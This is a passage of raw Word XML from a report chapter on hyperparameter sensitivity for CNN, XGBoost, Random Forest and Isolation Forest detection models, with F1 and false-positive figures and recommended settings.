        <w:t>, but</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>that edge should be probed cautiously against training divergence rather than</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>assumed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>The three architectural/regularisation knobs behave like classic</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>second-order refinements around a healthy operating point:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="20" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>`dropout`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> trades capacity for regularisation monotonically: lighter</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">dropout (0.1) gives the best F1 (0.8362) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the lowest CNN FPR in the study</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>(0.0490); heavier dropout (0.5) underfits (0.8115). On a 5000-row subsample the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>0.1 optimum is partly a small-data artefact — less regularisation looks better</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>when there is less to overfit against.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="20" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>`num_filters`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> shows mild capacity gains (0.8165 → 0.8379) but its FPR is</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>non-monotone: 256 filters win F1 yet raise FPR to 0.0695 versus 0.0547 at 128,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>so the extra capacity partly buys itself back in false alarms.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="20" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>`embed_dim`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> peaks at </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>32</w:t>
      </w:r>
      <w:r>
        <w:t>: 16 underfits (0.8046) and 64 gives no F1 gain</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>(0.8281) while worsening FPR (0.0547 → 0.0796) — a clean saturation point.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Recommended settings — CNN</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recommended</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>rationale</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>learning_rate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.003</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Best F1 (0.8512) and lowest FPR (0.0533); the single highest-leverage choice. Consider a brief probe just above 3e-3, guarding against divergence.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>dropout</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.1 was best on the subsample (F1 0.8362) but confirmed as a small-data artefact: the full-data CNN run achieves F1 0.8603 with dropout=0.3, confirming 0.3 as the production setting.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>num_filters</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>128</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Best F1/FPR balance (0.8298 / 0.0547). Move to 256 only if the ~0.008 F1 gain outweighs the higher FPR (0.0695).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>embed_dim</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>32</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Saturation point: best FPR (0.0547) and near-best F1 (0.8298); 64 adds cost and false alarms without F1 gain.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Best observed CNN configuration in the sweep: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>learning_rate=0.003</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>F1 0.8512, FPR 0.0533</w:t>
      </w:r>
      <w:r>
        <w:t>), comfortably ahead of the best XGBoost point</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>(F1 0.7354).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Cross-model synthesis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question</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>answer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Which hyperparameter most affects </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>F1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>`learning_rate`</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CNN 0.7127→0.8512 (Δ0.1385); largest F1 swing on XGBoost too (Δ0.0481).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Which hyperparameter most affects </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>FPR</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>`scale_pos_weight`</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> (XGBoost)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.049→0.1447, ~3×, while F1 barely moves (Δ0.0184).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Which model is more sensitive overall?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CNN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Its outcome hinges on getting </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>learning_rate</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> right; XGBoost F1 is saturated (~0.71–0.735) and largely tuning-proof.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Two design lessons follow. First, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>the levers are decoupled by role</w:t>
      </w:r>
      <w:r>
        <w:t>: F1 is an</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>optimisation/convergence</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> story (get </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>learning_rate</w:t>
      </w:r>
      <w:r>
        <w:t>, and for XGBoost the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>n_estimators</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>max_depth</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> capacity, out of the underfitting regime), whereas the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">false-alarm rate is a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>decision-threshold</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> story best controlled with a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">purpose-built dial like </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>scale_pos_weight</w:t>
      </w:r>
      <w:r>
        <w:t>. Second, **XGBoost's insensitivity is</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>itself a deployment asset**: a model that holds ~0.73 F1 across almost any</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>reasonable setting is low-risk to operate and re-train, even if its ceiling</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">trails the CNN. Full-data revalidation confirms both findings: XGBoost </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>max_depth=12</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> generalises</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>(hybrid F1 0.8761 on Dataset 1, up from 0.853 at depth 6), and the CNN holds F1 0.8603</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">with the conservative </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>dropout=0.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — the aggressive </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>dropout=0.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>learning_rate=3e-3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>combination is not needed and not applied.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="200" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Chapter 7 — Hyperparameter Sensitivity: Random Forest &amp; Isolation Forest</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Companion to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ch7_sensitivity_findings.md</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (XGBoost/CNN). This section reports</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>sensitivity sweeps for the two remaining models — the Random Forest classifier</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>and the Isolation Forest anomaly detector — on both datasets, using the final</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">43-feature engineered set. Reproduce with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>python analysis/ch7_rf_if_sweeps.py</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">(results in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>results/ch7_rf_if_sensitivity.json</w:t>
      </w:r>
      <w:r>
        <w:t>, figures</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>report/figures/ch7_sensitivity_{random,isolation}_forest_*.png</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>Two methodological differences from the XGBoost/CNN sweeps, both deliberate:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="20" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Full data, full grid.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> RF on 43 engineered features fits in ~1–3 s, so</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>instead of one-at-a-time sweeps on a 5,000-row subsample we run the complete</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>n_estimators</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> × </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>max_depth</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> grid (12 configs) on the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>full training data</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>(D1: n_train = 12,199 / n_test = 3,049; D2: n_train = 7,661 /</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>n_test = 1,915). No subsample caveat applies to any number below.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="20" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>**The Isolation Forest sweep is an operating-point study, not a capacity</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
